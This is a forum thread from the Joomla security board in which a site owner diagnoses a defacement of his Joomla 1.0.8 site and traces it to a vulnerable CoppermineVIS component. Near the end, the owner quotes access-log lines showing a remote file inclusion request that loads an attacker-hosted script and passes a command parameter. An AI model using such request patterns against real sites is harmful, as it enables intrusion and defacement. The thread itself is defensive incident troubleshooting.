It is currently Thu Aug 28, 2008 8:08 pm

My Joomla Site Was Hacked via CoppermineVIS

Discussion regarding Joomla! security issues.

Moderators: General Support Moderators, Hidden - JSST

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.

My Joomla Site Was Hacked via CoppermineVIS

Postby Klementz on Thu Apr 13, 2006 10:29 pm

My site was hacked, so that visitors would see a plain white screen with this text:

A1TS /home/clements Ownz /home/clements :: by Shaka

It appears that only the index.php file was over written. I could still access the back end and all the content was still there. As well, a second installation of Joomla (1.0.7) in a sub domain remained untouched.

Details:

Joomla 1.0.8
PHP 4.4.1
MySQL 4.1.14-standard-log
Apache 1.3.34 (Unix)

Site is hosted by http://www.bluehost.com and is shared hosting.

I have access to the “Raw Access Logs” through cpanel, but have trouble sorting through the text. (Is there some sort of application that organizes that data?)

I have the following components installed on the site: AKObook 3.42 with the hack to add the security codes; Coppermine 1.4.3; CoppermineVIS Premium 1.30; joomlaXplorer 1.3.2; mosCE 1.0.3; PU Arcade.

Hmm… I *did* have JCE editor installed, but it seems to have vanished.

I have the following mambots installed: MGM Image Gallery; Imbed PHP (kl_php);  the usual regular stuff.

My service provider told me this: My Fantastico control panel indicates I have Coppermine 1.3.4 and Joomla 1.0.3 installed. Those are the last versions I had installed via Fantastico before I started doing it myself. The tech support guy claimed that this is how the kiddie got in and told me to uninstall those old versions through Control Panel if I had manually installed newer versions myself. I am 99.999% sure that if I do that, I will be uninstalling my existing versions. He told me to do a full back up download, uninstall, then reinstall from the back up to clean it up, making the additional claim that I needed to do this because they probably got into my databases, too. Hmmm. Is this good advice?

Meanwhile, they did a restore and the site is back. I think if I just had a copy of the index.php file I could have uploaded it.

One more piece of information: I use .htaccess to protect the admin folder, so I have to login twice when accessing the backend, once to get through .htaccess, and once to get into Joomla.

The big question is: Where is the weak point that allowed this to happen?


Edit: title of post
Last edited by Klementz on Fri Apr 14, 2006 4:11 am, edited 1 time in total.
User avatar
Klementz
Joomla! Enthusiast
Joomla! Enthusiast
 
Posts: 210
Joined: Sun Aug 28, 2005 2:55 pm
Location: Barrie, Ontario CANADA

Re: My Joomla 1.0.8 Site Was Hacked

Postby Hackwar on Thu Apr 13, 2006 11:48 pm

Have you read the sticky in this forum?
god doesn't play dice with the universe. not after that drunken night with the devil where he lost classical mechanics in a game of craps.

Since the creation of the Internet, the Earth's rotation has been fueled, primarily, by the collective spinning of English teachers in their graves.
User avatar
Hackwar
Joomla! Virtuoso
Joomla! Virtuoso
 
Posts: 3656
Joined: Fri Sep 16, 2005 8:41 pm
Location: NRW - Germany

Re: My Joomla 1.0.8 Site Was Hacked

Postby Klementz on Fri Apr 14, 2006 12:07 am

Hackwar wrote:Have you read the sticky in this forum?


Yes. And I carefully gathered all the information requested. Did I miss something? I thought I was at this stage:

[quote=∓quot;Sticky Note"\]
I have checked all this, what can I do now?
Ok, you have collected all the files, you are sure that its Joomla and not your or your providers configuration that has caused the hacker to gain access to your server and you also have eliminated all third party extensions as source of the vulnerability. Now wrap all that information up in a nice mail and send it to security [at] joomla [dot] org. With this mailinglist you reach the developers and they will investigate this further.[/quote]

Obviously I can't really tell if it was a Bluehost vulnerability and I am trying to find out if the problem lies in my installation.

Was I not supposed to ask for help here?
User avatar
Klementz
Joomla! Enthusiast
Joomla! Enthusiast
 
Posts: 210
Joined: Sun Aug 28, 2005 2:55 pm
Location: Barrie, Ontario CANADA

Re: My Joomla 1.0.8 Site Was Hacked

Postby Hackwar on Fri Apr 14, 2006 12:22 am

Sorry, no, it was okay. I'm just a bit sleepy... I can't really help you. Lets hope someone else can. I think someone will tomorrow... ;)
god doesn't play dice with the universe. not after that drunken night with the devil where he lost classical mechanics in a game of craps.

Since the creation of the Internet, the Earth's rotation has been fueled, primarily, by the collective spinning of English teachers in their graves.
User avatar
Hackwar
Joomla! Virtuoso
Joomla! Virtuoso
 
Posts: 3656
Joined: Fri Sep 16, 2005 8:41 pm
Location: NRW - Germany

Re: My Joomla 1.0.8 Site Was Hacked

Postby virtualmaker on Fri Apr 14, 2006 2:09 am

Hi!

Remember, the configuration.php should be dont writable after you do modifications, it´s very important...
User avatar
virtualmaker
Joomla! Enthusiast
Joomla! Enthusiast
 
Posts: 175
Joined: Tue Nov 08, 2005 10:44 pm
Location: Madrid

Re: My Joomla 1.0.8 Site Was Hacked

Postby stingrey on Fri Apr 14, 2006 2:51 am

There is possibly a security vulnerability within the CoppermineVIS component:
http://forum.joomla.org/index.php/topic,51714.0.html

This could have been the point of weakness, however you need to examine your access logs.
Joomla! Core Team Member
Software Coding and Design - Stability Team Leader

God grant me the Serenity to Accept the things I cannot change, the Courage to change the things I can and the Wisdom to know the Difference.
User avatar
stingrey
Joomla! Hero
Joomla! Hero
 
Posts: 2690
Joined: Mon Aug 15, 2005 4:36 pm
Location: Marikina, Metro Manila, Philippines

Re: My Joomla 1.0.8 Site Was Hacked via CoppermineVIS

Postby Klementz on Fri Apr 14, 2006 4:10 am

The (not so) funny thing is, I wasn't even using that component any more. But I guess it was there, published on my site.

I don't know enough about these access logs, but I think this stuff may be the culprit:

POST /index.php?option=com_copperminevis&Itemid=1&place=gallery&option=com_copperminevis&Itemid=1&place=http%3A%2F%2Fxpl.netmisphere2.com%2Ftool.txt%3F&&s=r& HTTP/1.1" 200 17497

GET /index.php?option=com_copperminevis&Itemid=1&place=http://xpl.netmisphere2.com/tool.txt?&&s=r&cmd= HTTP/1.1" 200 13383 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

etc. etc. etc.

CoppermineVIS is now uninstalled.

Thank you!!
User avatar
Klementz
Joomla! Enthusiast
Joomla! Enthusiast
 
Posts: 210
Joined: Sun Aug 28, 2005 2:55 pm
Location: Barrie, Ontario CANADA

Re: My Joomla Site Was Hacked via CoppermineVIS

Postby Wil on Fri Apr 14, 2006 4:38 am

Did you patched copperminevis? It was vuneralbe but is already fixed! You be aware and watch for probs with the software you're using.
Look on joombla.com copperminevis is safe now if you download the recent version!
Wil
Joomla! Intern
Joomla! Intern
 
Posts: 62
Joined: Thu Aug 18, 2005 1:47 pm

Re: My Joomla Site Was Hacked via CoppermineVIS

Postby Klementz on Fri Apr 14, 2006 1:31 pm

Wil wrote:Did you patched copperminevis?


No, I wasn't even using it. After I started using it, there was something about it that I didn't like (can't remember now). Therefore, it was just sitting there being ignored.

What I have learned is that a component doesn't actually need to be in use to be vulnerable. I am going to uninstall all the other stuff that is sitting on my site not being used.
User avatar
Klementz
Joomla! Enthusiast
Joomla! Enthusiast
 
Posts: 210
Joined: Sun Aug 28, 2005 2:55 pm
Location: Barrie, Ontario CANADA


Return to Security - 1.0.x

Who is online

Users browsing this forum: No registered users and 6 guests